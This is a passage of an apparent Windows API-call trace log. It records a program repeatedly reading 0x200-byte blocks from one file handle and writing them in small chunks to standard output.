lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 [0139.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.540] GetFileType (hFile=0x4c) returned 0x1 [0139.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.540] GetFileType (hFile=0x4c) returned 0x1 [0139.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.540] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.541] GetFileType (hFile=0x4c) returned 0x1 [0139.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.541] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.541] GetFileType (hFile=0x4c) returned 0x1 [0139.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.541] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.541] GetFileType (hFile=0x4c) returned 0x1 [0139.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.541] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] GetFileType (hFile=0x4c) returned 0x1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] GetFileType (hFile=0x4c) returned 0x1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] GetFileType (hFile=0x4c) returned 0x1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.542] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.542] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.542] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.542] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] GetFileType (hFile=0x4c) returned 0x1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] GetFileType (hFile=0x4c) returned 0x1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] GetFileType (hFile=0x4c) returned 0x1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] GetFileType (hFile=0x4c) returned 0x1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.542] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] GetFileType (hFile=0x4c) returned 0x1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] GetFileType (hFile=0x4c) returned 0x1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] GetFileType (hFile=0x4c) returned 0x1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] GetFileType (hFile=0x4c) returned 0x1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.543] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.543] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.543] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.543] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] GetFileType (hFile=0x4c) returned 0x1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] GetFileType (hFile=0x4c) returned 0x1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] GetFileType (hFile=0x4c) returned 0x1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] GetFileType (hFile=0x4c) returned 0x1 [0139.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.543] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] GetFileType (hFile=0x4c) returned 0x1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] GetFileType (hFile=0x4c) returned 0x1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] GetFileType (hFile=0x4c) returned 0x1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] GetFileType (hFile=0x4c) returned 0x1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.544] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.544] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.544] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.544] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] GetFileType (hFile=0x4c) returned 0x1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] GetFileType (hFile=0x4c) returned 0x1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] GetFileType (hFile=0x4c) returned 0x1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.544] GetFileType (hFile=0x4c) returned 0x1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] GetFileType (hFile=0x4c) returned 0x1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] GetFileType (hFile=0x4c) returned 0x1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] GetFileType (hFile=0x4c) returned 0x1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] GetFileType (hFile=0x4c) returned 0x1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.545] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.545] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.545] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.545] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] GetFileType (hFile=0x4c) returned 0x1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] GetFileType (hFile=0x4c) returned 0x1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] GetFileType (hFile=0x4c) returned 0x1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] GetFileType (hFile=0x4c) returned 0x1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] GetFileType (hFile=0x4c) returned 0x1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] GetFileType (hFile=0x4c) returned 0x1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] GetFileType (hFile=0x4c) returned 0x1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] GetFileType (hFile=0x4c) returned 0x1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.546] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.546] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.546] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.546] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] GetFileType (hFile=0x4c) returned 0x1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] GetFileType (hFile=0x4c) returned 0x1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] GetFileType (hFile=0x4c) returned 0x1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] GetFileType (hFile=0x4c) returned 0x1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] GetFileType (hFile=0x4c) returned 0x1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] GetFileType (hFile=0x4c) returned 0x1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] GetFileType (hFile=0x4c) returned 0x1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] GetFileType (hFile=0x4c) returned 0x1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.547] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.547] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.547] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.547] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] GetFileType (hFile=0x4c) returned 0x1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] GetFileType (hFile=0x4c) returned 0x1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] GetFileType (hFile=0x4c) returned 0x1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] GetFileType (hFile=0x4c) returned 0x1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] GetFileType (hFile=0x4c) returned 0x1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] GetFileType (hFile=0x4c) returned 0x1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] GetFileType (hFile=0x4c) returned 0x1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] GetFileType (hFile=0x4c) returned 0x1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.548] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.548] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.548] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.548] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] GetFileType (hFile=0x4c) returned 0x1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] GetFileType (hFile=0x4c) returned 0x1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] GetFileType (hFile=0x4c) returned 0x1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] GetFileType (hFile=0x4c) returned 0x1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] GetFileType (hFile=0x4c) returned 